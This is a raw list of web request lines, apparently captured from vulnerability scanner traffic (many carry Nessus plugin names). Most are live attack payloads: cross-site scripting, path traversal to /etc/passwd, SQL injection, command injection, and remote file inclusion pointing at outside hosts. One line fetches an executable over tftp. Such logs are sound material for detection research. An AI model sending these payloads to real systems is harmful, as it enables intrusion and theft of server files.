GET /en-us/dda2qr7j.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /m4kkjf8l.asp?<script>document.cookie="testyglc=8988;"</script>
GET /mpcgi/ion-p?page=../../../../../etc/passwd
GET /examples/jsp/checkbox/index.php?cat='
GET /h4bi26jd.aspx?<script>document.cookie="testhrzx=1150;"</script>
GET /examples/jsp/colors/add_url.htm?node=<script>alert('xss')</script>
GET /subscriptions.jpg
GET /t578vqea.htm?<script>document.cookie="testsory=7676;"</script>
GET /examples/jsp/error/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd
GET /javascript/htpasswd.py
GET /scripts/index.php?board=nonexistant674192050
GET /coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
GET /top.php?stuff=ver\x0b>q75783184&rem\x0b
GET /scripts/9pen4xzgztjn.sh
GET /examples/jsp/checkbox/index.php?id=0rop9yeuxw'
GET /examples/jsp/jsp2/jspx/al_initialize.php?alpath=/etc/passwd\x00
GET /d5a5renl.kspx?<script>cross_site_scripting.nasl</script>
GET /y8pmygrp.htm?<script>cross_site_scripting.nasl</script>
GET /javascript/pubs.exe
GET /help.php?q="&rm\x09q57946156\x09#
GET /en-us/hipkz026.php?<meta http-equiv=set-cookie content="testyrbs=2855">
GET /scripts/1hactwocbsuo.cfm
GET /main.php?logout=\x0auname\x09>q18697999\x09#
GET /scripts/servubrowse.asp
GET /javascript/submit.exe
GET /help.php?q="ver\x09>q14739543&rem\x09
GET /cgis/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
GET /p043snfr.php3?<script>cross_site_scripting.nasl</script>
GET /scripts/vzdybnanqpc3.php
GET /i686v90l.cfc?<script>document.cookie="testfutf=1550;"</script>
GET //../../../../../../../../etc/passwd\x00
GET /cgis/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /hrttz9fj.fts?<script>document.cookie="testtbjy=7334;"</script>
GET /cgi-bin/showproduct.php?product=1'
GET /bb000001.pl<script>alert('vulnerable')</script>
GET /examples/jsp/jsp2/jspx/config.php?returnpath=/etc/passwd\x00
GET /i7prbs22.cgi?<script>document.cookie="testjnre=7328;"</script>
GET /cacti/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd
GET /examples/jsp/jsp2/jspx/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd
GET /help.php?q='\x0auname\x09>q12762848\x09#
GET /cacti/cal_week.php?op=week&catview=999'
GET /apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
	messagedetail.asp?msg_id='
GET /um7xpn15.mscgi?<script>document.cookie="testotoy=6142;"</script>
GET /main.php?logout="|ping -w 9000 -n 1 4.3.2.1|rem 
GET /scripts/zq9frlz6fcfp.php
GET /admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd
GET /0z575z74.htm?<script>document.cookie="testuhsv=9753;"</script>
GET /recordings/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
GET /cgi-bin/guestbook/passwd
GET /8x6w469u.kspx?<script>document.cookie="testgfjr=1286;"</script>
GET /kerkhoffs'_law/
GET /javascript/document.msg
GET /i686v90l.kspx?<meta http-equiv=set-cookie content="testfutf=1550">
GET /javascript/replicated.exe
GET /3j8echh0.html?<meta http-equiv=set-cookie content="testfuqi=4189">
GET /examples/servlets/servlet/rss.php?blogid=1&profile=../../config/config.properties.php\x00
GET /scripts/zq9frlz6fcfp.cfm
GET /cacti/calendar.php?serverpath=/etc/passwd\x00
GET /cgibin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go
GET /main.php?stuff="ver\xa0>q63696925&rem\xa0
GET /phpnuke/html/.php?name=network_tools&file=index&func=ping_host&hinput=;id
GET /recordings/shoutbox.php?conf=../
GET /demos/demo.browse.php?filename=/etc/passwd
GET /<script>document.cookie="testvowq=604;"</script>
GET /fpnpp5zg.pl?<meta http-equiv=set-cookie content="testyias=101">
GET /scripts/weigh_keywords.php?etcdir=http://cirt.net/rfiinc.txt?
GET /j4rdyhw8.php?<script>document.cookie="testrluj=1420;"</script>
GET /help.php?q=";uname >q49727674 #
GET /main.php?logout=/'
GET /main.php<?eval($_post['q54461335']);?eval($_post['q54461335']);?>
GET /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 412834017--
GET /s7qus4g3.php?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /script_saved/
GET /comments.php?scriptpath=http://192.168.202.96:8080/frznctvhi0i5??
GET /index.php?page=../../../../../../../../../../../../../../../../../winnt/system32/ipconfig.exe
GET /m2fpztty.pl?<script>cross_site_scripting.nasl</script>
GET /phpmyadmin/index.php?string='
GET /tuwjta1w.htm?<script>document.cookie="testpokn=7494;"</script>
GET /cleartrust/ct_logon.asp?ctauthmode=basic&ctloginerrormsg=xx&ct_orig_uri=\">< script>alert(1)/script><\"
GET /cgi-915/ppdscgi.exe
GET /main.php?logout="ping;-w;10000;-n;1;4.3.2.1&rem;
GET /javascript/nude.exe
GET /y8pmygrp.do?<script>cross_site_scripting.nasl</script>
GET /scripts/counter.exe
GET /vac1l5vm.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /ybz5rz7a.php?<script>document.cookie="testsbvw=6289;"</script>
GET /examples/jsp/jsp2/jspx/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
GET /javascript/htpasswd.rhtml
GET /ju0u7kfo.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/cal/misc/audio.php?recording=../version.inc
GET /grid_subscriptions2/
GET /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lnu3g9zkqrlule9mw
GET /examples/jsp/colors/hw3.cgi?daysonly=0).system('id').(
GET /eei78ore.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
	../../../../../../../../../../../../etc/passwd
GET /<meta http-equiv=set-cookie content="testsixi=8451">
GET /javascript/hp.exe
GET /qhvu0pdg.php?<script>document.cookie="testchuc=2100;"</script>
GET /cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id=
GET /main.php?logout=';uname >q89385457 #
GET /scripts/ggvfa_wichxq.asp
GET /eei78ore.php?<script>cross_site_scripting.nasl</script>
GET /javascript/.passwd.dll
GET /src/scripture.php?pageheaderfile=@rfiurl?pageheaderfile=@rfiurl?
GET /securecgi-bin/csusercgi.exe?help+00.abcd.e.fghijk"""><script>alert("""xss""")</script>
GET /index.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp?
GET /javascript/pc.exe
	http://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.cfm
	<meta http-equiv=set-cookie content="testjvvf=7721">
GET /cgi-perl/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
GET /nsn/..\util/ren.bas
GET /examples/servlets/servlet/faxsurvey?cat /etc/passwd
GET /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('/./tmp/fetpkvinrp.sh+>+/dev/null+&')."]=1
GET /en-us/jnv890lt.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scripts/save.php?file_save=/etc/passwd
GET /phpmyadmin/notify?from=nessus"|id"
GET /examples/jsp/error/index.php?op=default&date=200607' union select 1,1200541698,1,1,1,1,1,1,1,1--&blogid=1
GET /help.php?q="ping;-w;11000;-n;1;4.3.2.1&rem;
GET /scripts/zdbyw3dn3gh2.html
GET /q703m78q.kspx?<script>document.cookie="testvowq=604;"</script>
GET /main.php?stuff="&ver;>q22147997&rem;
GET /help.php?q="|ping\xa0-w\xa09000\xa0-n\xa01\xa04.3.2.1|rem\xa0
GET /script/tick/allincludefortick.php?path_to_code=http://192.168.202.118:8080/zz5thkvtmlgl?
GET /v3axg1p8.cfm?<meta http-equiv=set-cookie content="testxagh=6987">
GET /p043snfr.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /main.php?logout="|ping;-w;11000;-n;1;1.2.3.4|rem;
GET /javascript/stored.exe
GET /launch.asp?nfuse_application=<script>alert('vulnerable')</script>
GET /cacti/dsweb/services/user-1"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>
GET /p043snfr.do?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /xfkun1ku.htm?<script>cross_site_scripting.nasl</script>
GET /ghswfouu.cfm?<script>document.cookie="testsqmm=5713;"</script>
GET /top.php?stuff="rm\x09q12423295&rem\x09
GET /main.php?stuff=&uname >q17531529 #
GET /h5sc3gxy.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /javascript/reference.exe
GET /interface/login/login_frame.php?site="><!--#exec cmd="dir \"--><
GET /scripts/vzdybnanqpc3.asp
GET /main.php?stuff="&sleep\x099\x09#
GET /en-us/oie504mr.php3?<script>document.cookie="testtpby=7052;"</script>
GET /scripts/k0pxpjgnimox.cfm
GET /de3v2dd9.aspx?<script>cross_site_scripting.nasl</script>
	<meta http-equiv=set-cookie content="testabrn=6368">
GET /x7pclv4s.kspx?<meta http-equiv=set-cookie content="testiulz=3709">
GET /scripts/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html
GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
GET /fnwhrxyd.htm?<script>cross_site_scripting.nasl</script>
GET /examples/jsp/sessions/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
GET /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
GET /examples/servlets/servlet/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl
GET /bxnyrhmh.aspx?<meta http-equiv=set-cookie content="testmjct=1867">
GET /scripts/misc/info.php
GET /ybz5rz7a.html?<script>document.cookie="testsbvw=6289;"</script>
	<script>document.cookie="testbnli=1975;"</script>
GET /help.php?q="&ping\x09-w\x098000\x09-n\x091\x094.3.2.1&rem\x09
GET /<meta http-equiv=set-cookie content="testxagh=6987">
GET /main.php?stuff="rm q23955852 #
GET /scripts/ubbthreads.php
GET /azcrfs8d.jspa?<meta http-equiv=set-cookie content="testjpdr=9205">
GET /examples/servlets/servlet/?"><script>alert('struts_sa_surl_xss.nasl')</script>
GET /b5xdqgz2.cgi?<script>cross_site_scripting.nasl</script>
GET /169okeyj.mscgi?<script>document.cookie="testxeoi=3573;"</script>
GET /scripts/axdgpyi2bn6f.php
GET /scripts/msmmask.exe?mask=/nessus312940811.asp
GET /recordings/admin.php?style=../../../../../../../../../../../../etc/passwd\x00
GET /examples/jsp/checkbox/index.php?templates_dir=/etc/passwd\x00
GET /scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1332010394')</script>
GET /javascript/message.exe
GET /scripts/d3z7yywpyeoa.pl
GET /top.php?stuff="&ver&rem 
GET /examples/servlets/servlet/resetpw.php?email=../../../../../../../../../../../../etc/passwd
GET /javascript/solved.exe
GET /index.php?action=search&searchfor=\"><script>alert('vulnerable')</script >
GET /main.php?stuff="&ver;>q86839174&rem;
GET /oie504mr.nsf?<script>document.cookie="testtpby=7052;"</script>
GET /nyvbv05h.cgi?<script>document.cookie="testftxz=5980;"</script>
GET /javascript/dbmodules.exe
GET /mail.php?id='/**/union/**/select/**/1,2,1331919224,4--&blog=1
GET /examples/jsp/cal/web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html
GET /fpnpp5zg.asp?<script>document.cookie="testyias=101;"</script>
	ftp://192.168.28.202/*<apache_mod_proxy_ftp_glob_xss.nasl>
GET /raanw4ia.mscgi?<script>cross_site_scripting.nasl</script>
GET /cgibin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
GET /scripts/k0pxpjgnimox.shtml
GET /h5i6crm3.mscgi?<meta http-equiv=set-cookie content="testlihk=7070">
GET /hipkz026.php?<script>document.cookie="testyrbs=2855;"</script>
GET /6n7aacgg.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/num/demos/demo.browse.php?filename=/etc/passwd
GET /jnt3f86c.htm?<meta http-equiv=set-cookie content="testcmax=9270">
GET /help.php?q=uname\x09>q77267797\x09#
GET /bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
GET /javascript/ppt.exe
GET /dda2qr7j.pl?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /j2kdmfw4.cfc?<script>cross_site_scripting.nasl</script>
GET /index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --
GET /examples/jsp/jsp2/jspx/index.php?user_langue=../../../../../../../../../../etc/passwd
GET /0rufe52p.php3?<script>cross_site_scripting.nasl</script>
GET /static//..\..\..\..\..\..\..\..\etc/passwd
GET /cgi-915/a1stats/a1disp3.cgi?../../../../../../../etc/passwd
GET /main.php?stuff="ping,-w,9000,-n,1,4.3.2.1&rem,
GET /_vti_bin/shtml.exe
GET /help.php?q="rm\x0cq43711515&rem\x0c
GET /main.php?stuff=";rm\x09q18442351\x09#
GET /cgi-bin/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
GET /main.php?stuff="ping -w 10000 -n 1 4.3.2.1&rem 
GET /nuh3zirz.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
GET /o6ebbirj.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/cal/viewcvs.cgi/?cvsroot=<script>foo</script>
GET /javascript/~log.exe
GET /cgi-bin/index.php?op=default&date=200607' union select 1,1192121872,1,1,1,1,1,1,1,1--&blogid=1
GET /cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904240','5'--
GET /script/plugins/phpgacl/admin/index.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?
GET /phpmyadmin/documentation.html?'"=1
GET /index.php?cid='
GET /cacti/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
GET /examples/jsp/sessions/sawmill6cl.exe?ho+{complete_version}
GET /apavxugx.jsp?<script>document.cookie="testdnbh=5237;"</script>
GET /javascript/pool.exe
GET /examples/jsp/num/index.php?_language=../../../../../../../../../../etc/passwd\x00
GET /aj3pf49c.cfm?<script>document.cookie="testnofv=4170;"</script>
GET /main.php?logout="&ping,-w,11000,-n,1,4.3.2.1&rem,
GET /imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql+--&pass=x
GET /scripts/weigh_keywords.php?etcdir=http://192.168.202.96:8080/4dckqcc0acprbz?
GET /9ko6m4c8.php3?<meta http-equiv=set-cookie content="testylik=3403">
GET /scripts/index.php?id='union/**/select/**/0,0,521532225,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
GET /top.php?stuff="&del q85387982 #
GET /javascript/.passwd.csproj
GET /javascript/catalogs.exe
GET /jdx255ea.cfc?<meta http-equiv=set-cookie content="testziyq=5055">
GET /recordings/phf?qalias=x\x0a/bin/cat /etc/passwd
GET /examples/jsp/num/popup.php?include_path=/etc/passwd\x00
GET /top.php?stuff="\x0asleep\x097\x09#
GET /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --
GET /en-us/9kr0ih0v.asp?<script>document.cookie="testzgnm=1183;"</script>
GET /javascript/running.exe
GET /cgi-bin/home/search.asp?nchannel='1
GET /main.php?logout="del q21367835&rem 
GET /cgi-bin/..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og
GET /rv98iwjp.htm?<script>cross_site_scripting.nasl</script>
GET /cgi-bin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
GET /phpmyadmin/documentation.html?phpmyadmin=/etc/passwd
GET /examples/jsp/error/calendar_admin.pl?config=|cat /etc/passwd|
GET /scripts/ck8pj.exe?/x+/c+tftp -i 192.168.202.118 get durjhxa1 qowmcdks.exe
GET /phpmyadmin/documentation.html?phpmyadmin=|cat /etc/passwd|
GET /main.php?logout='del\x09q76232693\x09#
GET /examples/jsp/num/install.php?newlang=../../cpg_error.log\x00
GET /javascript/closing.exe
GET /javascript/monitoring.exe
GET /en-us/fo564rei.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /prescription010507/
GET /if69ddo1.nsf?<meta http-equiv=set-cookie content="testiabz=5220">
GET /javascript/roaming.exe
GET /6qbynt4f.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /jnv890lt.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /6qbynt4f.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /3hlysl2x.pl?<meta http-equiv=set-cookie content="testgjbe=8505">
GET /main.php?logout="ping;-w;11000;-n;1;4.3.2.1&rem;
GET /examples/jsp/cal/calendar_admin.pl?config=|cat /etc/passwd|
GET /cgi-bin/search.jsp?q=%"<script>alert(1332008604)</script>
GET /rtph263dumpscript/
GET /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=10nbpndw5e2ir1ncx
GET /cgi-bin/mlog.html?screen=/etc/passwd
GET /main.php?stuff="&ping\x09-w\x098000\x09-n\x091\x091.2.3.4&rem\x09
GET /examples/jsp/jsp2/jspx/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00
GET /zroo33l4.php?<meta http-equiv=set-cookie content="testiklc=904">
GET /top.php?stuff='\x0asleep\x097\x09#
GET /scs86g1p.cfc?<script>document.cookie="testquyx=2820;"</script>
GET /d5a5renl.html?<script>cross_site_scripting.nasl</script>
GET /scripts/mapserv?map=mapserver_detect.nasl.map
GET /javascript/corporate.exe
GET /phpmyadmin/index.php?chemin=../../../../../../..//etc
GET /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
GET /ju0u7kfo.php?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /shoutbox/expanded.php?conf=../../../../../../../etc/passwd 
GET /help.php?q="rm\x09q12928131\x09#
GET /en-us/account/more.php?id=1'
GET /examples/servlets/servlet/forum_2.php?msg=10&return=<script>foo</script>
GET /m2fpztty.idc?<script>cross_site_scripting.nasl</script>
GET /l13b77e5.htm?<script>document.cookie="testjvvf=7721;"</script>
GET /javascript/.passwd.stackdump
GET /examples/jsp/num/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
GET /javascript/code.exe
GET /manager/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
GET /o1zj4u9v.asp?<meta http-equiv=set-cookie content="testabrn=6368">
GET /help.php?q='\x0auname #
GET /javascript/hit.exe
GET /main.php?stuff="ping\x09-w\x0910000\x09-n\x091\x091.2.3.4|rem\x09
GET /subscriptions.doc
GET /include/scripts/run_auto_suspend.cron.php?dir=@rfiurl
GET /nyjgaorz.kspx?<script>cross_site_scripting.nasl</script>
	<meta http-equiv=set-cookie content="testrluj=1420">
GET /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script>
GET /jnt3f86c.dll?<meta http-equiv=set-cookie content="testcmax=9270">
GET /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\x00
GET /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/ukirnkmpbn"
GET /script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz??
GET /cgi-914/powerup/r.cgi?file=../../../../../../../../../../etc/passwd
GET /main.php?stuff=&ver,>q61913742&rem,
GET /3j8echh0.php?<meta http-equiv=set-cookie content="testfuqi=4189">
GET /subscriptions.config
GET /tlhhwkvs.exe/
GET /javascript/auth.exe
GET /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/urcppbumwm0;echo|awstats379091.txt
GET /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.96:8080/4dckqcc0acprbz?\x00
GET /help.php?q=uname >q18373347 #
GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
GET /speech-transcript/
GET /zv8tv7h8.do?<script>document.cookie="testcqwz=9752;"</script>
GET /t7tm4m0b.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /manager/index.php?op=default&date=200607' union select 1,1128524552,1,1,1,1,1,1,1,1--&blogid=1
GET /help.php?q='\x0adel\x09q47355772\x09#
GET /examples/jsp/sessions/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
GET /m2fpztty.html?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /phpmyadmin/sawmillcl.exe?ho+{complete_version}
GET /sscript/
GET /cgi-bin/webplus?script=/../../../../etc/passwd
GET /subscriptions.part
GET /g8nu2yy7.jspa?<script>cross_site_scripting.nasl</script>
GET /top.php?stuff=';rm q26271527 #
GET /scripts/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\x00
GET /7dbjwpw6.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /cgibin/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|'
GET /top.php?stuff="ping -w 7000 -n 1 1.2.3.4&rem 
GET /cgi-bin/index.php?p='nessus
GET /main.php?stuff="sleep 11 #
GET /en-us/odzk29aa.nsf?<script>document.cookie="testtfvh=2141;"</script>
GET /scripts/prnnucptkixl.php
GET /ju0u7kfo.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /ydexw8by.x?<meta http-equiv=set-cookie content="testulex=4996">
GET /main.php?logout="&uname >q45435148 #
GET /cgi-win/ion-p?page=../../../../../etc/passwd
GET /cgibin/gw5/gwweb.exe?help=bad-request
GET /j4rdyhw8.fts?<script>document.cookie="testrluj=1420;"</script>
GET /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/djjeroppey.sh'); function v
GET /scripts/ylrvly9nh_pf.inc
GET /scripts/index.php?op=default&date=200607' union select 1,1100287420,1,1,1,1,1,1,1,1--&blogid=1
GET /scripts/vhost.php?action=logout&time=1331908735
GET /scripts/kfzqb5x87lvq.pl
GET /newsletter_log.php?logfile=info.php&logtime=000060&email=<?php echo md5("test"); ?>
GET /ao22ww7y.do?<script>document.cookie="testqppc=8767;"</script>
GET /javascript/globals.exe
GET /b5xdqgz2.exe?<script>cross_site_scripting.nasl</script>
GET /jw64yq8u.x?<meta http-equiv=set-cookie content="testylfu=1313">
GET /scripts/gitweb.pl
GET /main.php?logout='&del q16695623 #
GET /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919202
GET /uvazfs7p.pl?<meta http-equiv=set-cookie content="testwtbo=4831">
GET /cgi-bin/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1
GET /examples/jsp/error/faq.php?action=&type=view&s=&id=-1' union select 0,157871866,0,0,0,0,0--
GET /top.php?stuff='\x0auname\x09>q23871271\x09#
GET /manager/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- 
GET /javascript/subscription.exe
GET /ju0u7kfo.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /manager/admin/addentry.php?phpbb_root_path=/etc/passwd\x00
GET /recordings/index.php?chemin=../../../../../../..//etc
GET /en-us/account/home/search.asp?nchannel='1
GET /javascript/_vti_cnf.exe
GET /0qhcnefz.aspx?<script>cross_site_scripting.nasl</script>
GET /ssxmagazinesubscription/
GET /en-us/<img src="javascript:alert(cross_site_scripting.nasl);">.dll
GET /examples/servlets/servlet/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435
GET /examples/jsp/checkbox/newsscript.pl?mode=admin
GET /en-us/ddoworrl.asp?<script>document.cookie="testvlau=8517;"</script>
GET /javascript/resolution.exe
GET /examples/jsp/jsp2/jspx/include/sql.php?include_path=/etc/passwd\x00
GET /scripts/vzdybnanqpc3.inc
GET /\x80../\x80../\x80../\x80../\x80../\x80../winnt/win.ini
GET /fcgi-bin/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
GET /cgis/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\
GET /javascript/programs.exe
GET /help.php?q=&uname\x09>q82939622\x09#
GET /t3af3tdz.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scripts/index.php?board=nonexistant1419816536
GET /b5xdqgz2.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /bn857frh.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /s7qus4g3.cfm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scgi-bin/.htpasswd
GET /phpmyadmin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00
GET /en-us/account/a1stats/a1disp3.cgi?/../../../../../../etc/passwd
GET /recordings/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
GET /dslpwt15.do?<script>document.cookie="testtkio=5454;"</script>
GET /mom's ass/
GET /javascript/1994.exe
GET /scripts/qg9h0c0svvat.sh
GET /606wkcop.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /en-us/s7qus4g3.cfm?<script>cross_site_scripting.nasl</script>
GET /vhzmaia2.cfm?<meta http-equiv=set-cookie content="testkogj=3979">
GET /javascript/htpasswd.pl
GET /main.php?stuff="&ping,-w,11000,-n,1,1.2.3.4&rem,
GET /i2n4v4rl.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /postnuke/html/modules.php?op=modload&name=news&file=article&sid=<script>alert('vulnerable');</script>
GET /scripts/search.scr.php?globals[pth][classes]=http://cirt.net/rfiinc.txt??
GET /en-us/account/index.php?act=arcade&do=stats&gameid=1'
GET /g8nu2yy7.kspx?<script>cross_site_scripting.nasl</script>
GET /javascript/document.sfish
GET /help.php?q="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0
GET /7dbjwpw6.nsf?<script>cross_site_scripting.nasl</script>
GET /ny1b3qq4.x?<script>cross_site_scripting.nasl</script>
GET /faq.php?action=&type=view&s=&id=-1' union select 0,1323875856,0,0,0,0,0--
GET /scs86g1p.cfc?<meta http-equiv=set-cookie content="testquyx=2820">
GET /cgi-home/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
GET /oncixdescription/
GET /en-us/oie504mr.x?<script>document.cookie="testtpby=7052;"</script>
GET /main.php?logout=&ping;-w;7000;-n;1;4.3.2.1&rem;
GET /search.jsp?q=%"<script>alert(1331905049)</script>
GET /scripts/man-cgi?section=0&topic=ls;id
GET /xsskj3/
GET /main.php?stuff='\x0auname\x09>q47233887\x09#
GET /examples/jsp/jsp2/el/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd
GET /1r8cfrlf.kspx?<meta http-equiv=set-cookie content="testydan=5106">
GET /scripts/mensajeitor.php
GET /passwdage/
GET /en-us/splunk_413_404error_xss.nasl-1331904921
GET /bl8sefdm.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /banners.php?op=emailstats&cid=1 and passwd like 'a%'/*
GET /script/
GET /scripts/breakcal/calendar.cgi
GET /javascript/pipermail.exe
GET /examples/jsp/checkbox/index.php?id='union/**/select/**/0,0,1364632458,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
GET /bmeun223.cfm?<script>document.cookie="testhhwu=7044;"</script>
GET /t3af3tdz.do?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /yef5f3d5.jsp?<meta http-equiv=set-cookie content="testcrcv=6167">
GET /main.php?frm_daynight=day&frm_passwd=&frm_referer=q72116194&frm_user=&scr_height=&scr_width=
GET /scripts/rot13sj.cgi?/etc/passwd
GET /examples/jsp/jsp2/jspx/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>
GET /main.php?stuff=";rm q85142671 #
GET /ywaxntrx.jspa?<script>cross_site_scripting.nasl</script>
GET /help.php?q="ver\xa0>q74458178&rem\xa0
GET /<meta http-equiv=set-cookie content="testggad=2000">
GET /eg2u8pbv.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scripts/k0pxpjgnimox.php
GET /phpmyadmin/way-board/way-board.cgi?db=/etc/passwd\x00
GET /cacti/gadgets/blog/blogmodel.php?path=/etc/passwd\x00
GET /en-us/n9xlumt5.html?<script>cross_site_scripting.nasl</script>
GET /manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- 
GET /phpmyadminsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
GET /edit.jsp?page=user&editor=../../../install
GET /bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
GET /examples/jsp/sessions/supporter/tupdate.php?groupid=change&sg='
GET /bemarket/postscript/postscript.php?p_mode=http://192.168.202.118:8080/moclyxlwqyfjnp?
GET /scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/zz5thkvtmlgl?
GET /manager/scp.dll/sendto?template=../../../../../../../../../../../../boot.ini\x00gwextranet_template_dir_traversal.nasl
GET /grey's anatomy 3x09 repack hdtv/
GET /en-us/i686v90l.do?<meta http-equiv=set-cookie content="testfutf=1550">
GET /phpmyadmin/scripts/setup.php
GET /<script>document.cookie="testylfu=1313;"</script>
